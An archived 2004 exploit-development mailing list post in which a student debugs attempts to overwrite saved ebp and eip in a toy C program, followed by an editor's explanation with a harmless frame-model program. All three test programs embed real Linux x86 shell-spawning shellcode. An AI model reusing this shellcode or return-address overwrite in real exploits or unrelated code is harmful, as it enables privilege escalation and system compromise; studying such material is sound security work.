Vulnerability Development mailing list archives

problem with RET & debian debuggin'


From: "BORJA RUIZ CASTRO MORON, ESCUELA TÉCNICA SUPERIOR DE INFORMÁTICA" <padre () fedro ugr es>
Date: Tue, 09 Mar 2004 10:58:51 +0100

Hi, I'm playing with this lazy code, and I was surprised because while debugging
I see some strange behaviours:

#include <stdio.h>

int main(void)
{
    char foo[8];
    int i;
    char shellcode[] =
        "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
        "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
        "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
        "\xcd\x80/"
        "/bin/sh"
        "0";

    /* Write past the end of foo, one assignment every 4 bytes, from foo+0 to
     * foo+20.  foo[i] is a single char, so each assignment stores only the
     * low byte of the address (this is what the "assignment makes integer
     * from pointer without a cast" warning below refers to). */
    for (i = 0; i < 8 + 16; i += 4)
        foo[i] = &shellcode;
    return 0;
}
With this simple code I want to overwrite ebp and eip.
The ebp address should be foo+8 and the eip address foo+12.
Compile with the -g option and fire up gdb.
lobillo@Sion:~$ gcc -g -o prueba1 prueba1.c
prueba1.c: In function 'main':
prueba1.c:16: warning: assignment makes integer from pointer without a cast
lobillo@Sion:~$ gdb -q prueba1
(gdb) r
Starting program: /home/lobillo/prueba1
Program received signal SIGILL, Illegal instruction.
0x400361cf in __libc_start_main () from /lib/libc.so.6
(gdb) i r ebp eip
ebp            0xbffffacc       0xbffffacc
eip            0x400361cf       0x400361cf
(gdb) quit
A debugging session is active.
Do you still want to close the debugger?(y or n)
lobillo@Sion:~$
Hmmm, first we take a look around and see that ebp and eip contain
different addresses.
Why? I think the overwrite was theoretically implemented, but notice that gdb doesn't
think the same xD.
< foo >< ebp >< eip >
8      8      8
|      |      |
|------|------|------> &shellcode

Well, let's see: eip wasn't overwritten, but was ebp successfully overwritten? Let's
modify the code:

#include <stdio.h>

int main(void)
{
    char foo[8];
    int i;
    char shellcode[] =
        "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
        "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
        "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
        "\xcd\x80/"
        "/bin/sh"
        "0";

    /* Same loop as before, but with a fixed stack address instead of
     * &shellcode.  foo[i] is a char, so 0xbffffabc does not fit and only
     * its low byte, 0xbc, is stored (the "overflow in implicit constant
     * conversion" warning below). */
    for (i = 0; i < 8 + 16; i += 4)
        foo[i] = 0xbffffabc;
    return 0;
}

lobillo@Sion:~$ gcc -g -o prueba2 prueba2.c
prueba1.c: In function 'main':
prueba1.c:16: warning: overflow in implicit constant conversion
lobillo@Sion:~$ gdb -q prueba2
(gdb) r
Starting program: /home/lobillo/prueba2
Program received signal SIGSEGV, Segmentation fault.
0x40034370 in _dl_pagesize () from /lib/libc.so.6
(gdb) i r ebp eip
ebp            0xbffffabc       0xbffffabc
eip            0x40034370       0x40034370
(gdb) quit
A debugging session is active.
Do you still want to close the debugger?(y or n)
lobillo@Sion:~$

Yep, ebp overwritten, but what about eip? Let's investigate...

#include <stdio.h>

int main(void)
{
    char foo[8];
    int i;
    char shellcode[] =
        "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
        "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
        "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
        "\xcd\x80/"
        "/bin/sh"
        "0";

    /* Only the iterations i = 8 and i = 12 run here, so foo+8 and foo+12
     * each get one byte; as above, 0xbffffabc is truncated to 0xbc. */
    for (i = 8; i < 16; i += 4)
        foo[i] = 0xbffffabc;
    return 0;
}
Looking at the code, we notice that the for loop will overwrite only eip, skipping
ebp. Let's see what gdb thinks...
lobillo@Sion:~$ gcc -g -o prueba3 prueba3.c
prueba1.c: In function 'main':
prueba1.c:16: warning: overflow in implicit constant conversion
lobillo@Sion:~$ gdb -q prueba3
(gdb) r
Starting program: /home/lobillo/prueba3
Program received signal SIGSEGV, Segmentation fault.
0x40034370 in _dl_pagesize () from /lib/libc.so.6
(gdb) i r ebp eip
ebp            0xbffffabc       0xbffffabc
eip            0x40034370       0x40034370
(gdb) quit
A debugging session is active.
Do you still want to close the debugger?(y or n)
lobillo@Sion:~$

!!!!! ebp is 0xbffffabc? Oops, guys, this is why I wrote all this.
I don't understand why eip is not being overwritten and ebp is so strange :P
I'm coding under Debian Woody 3.0, and I notice that Debian has several
differences when debugging compared to other
distros; is that true? Thanks, and sorry for my poor English :P
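The two gcc warnings quoted in the post ("assignment makes integer from pointer without a cast" and "overflow in implicit constant conversion") both point at the same thing: foo is a char array, so foo[i] = 0xbffffabc stores one byte, 0xbc, not a 4-byte address, and the other three bytes of each stack slot keep whatever was there before. The program below is an added example (editor's code, not from the post) that models the frame layout the post assumes, foo[8] followed by a 4-byte saved ebp and a 4-byte saved eip, as a plain byte array, and runs the posted loop over it next to a loop that writes whole 32-bit words. The starting slot values 0xbffffac8 and 0x400361a0 are constructed to resemble the addresses in the post and are assumptions, as is the little-endian 32-bit layout; the page does not show the real saved values, and nothing here touches a real stack frame.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame model the post assumes: foo[8], then the saved ebp and the saved
 * eip as 4-byte little-endian slots, then 8 more bytes above them.  This
 * is a byte array constructed for the demo, not a real stack frame. */
#define FOO_LEN   8
#define EBP_OFF   (FOO_LEN)
#define EIP_OFF   (FOO_LEN + 4)
#define FRAME_LEN (FOO_LEN + 16)

/* Starting slot contents: made up to resemble the addresses in the post. */
#define SAVED_EBP 0xbffffac8u
#define SAVED_EIP 0x400361a0u

static uint32_t load_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void store_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)v;
    p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16);
    p[3] = (unsigned char)(v >> 24);
}

/* What actually lands in a char when a 32-bit value is assigned to it:
 * the low byte only.  The post's implicit version of this conversion is
 * what gcc's "overflow in implicit constant conversion" warning is about. */
unsigned char truncated_byte(uint32_t value)
{
    char c = (char)value;
    return (unsigned char)c;
}

/* The post's loop as written: foo[i] is a char, so each iteration stores
 * one byte at offsets 0, 4, 8, 12, 16, 20 and leaves the other three bytes
 * of every 4-byte slot untouched. */
void overwrite_as_posted(unsigned char *frame, uint32_t value)
{
    for (int i = 0; i < 8 + 16; i += 4)
        frame[i] = truncated_byte(value);
}

/* What the post intended: replace each whole 4-byte slot with the value. */
void overwrite_full_words(unsigned char *frame, uint32_t value)
{
    for (int i = 0; i < 8 + 16; i += 4)
        store_le32(frame + i, value);
}

/* Build the model frame, run one of the writers over it, and return the
 * 4-byte slot at slot_off (EBP_OFF or EIP_OFF) afterwards. */
uint32_t slot_after(void (*writer)(unsigned char *, uint32_t),
                    uint32_t value, int slot_off)
{
    unsigned char frame[FRAME_LEN];
    memset(frame, 'A', sizeof frame);          /* foo's contents don't matter */
    store_le32(frame + EBP_OFF, SAVED_EBP);
    store_le32(frame + EIP_OFF, SAVED_EIP);
    writer(frame, value);
    return load_le32(frame + slot_off);
}

int main(void)
{
    uint32_t v = 0xbffffabcu;
    printf("(char)0x%08x stores 0x%02x\n", v, truncated_byte(v));
    printf("byte writes: ebp=0x%08x eip=0x%08x\n",
           slot_after(overwrite_as_posted, v, EBP_OFF),
           slot_after(overwrite_as_posted, v, EIP_OFF));
    printf("word writes: ebp=0x%08x eip=0x%08x\n",
           slot_after(overwrite_full_words, v, EBP_OFF),
           slot_after(overwrite_full_words, v, EIP_OFF));
    return 0;
}
```

Compile with gcc -std=c99 -Wall and run. The as-posted writer changes exactly one byte of each slot, so a saved ebp that already started as 0xbffffaXX reads 0xbffffabc afterwards while the saved eip keeps its high three bytes; the word writer replaces both slots outright. Whether the poster's saved ebp really started that way is not shown on the page; the model only shows what a one-byte store can and cannot do.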

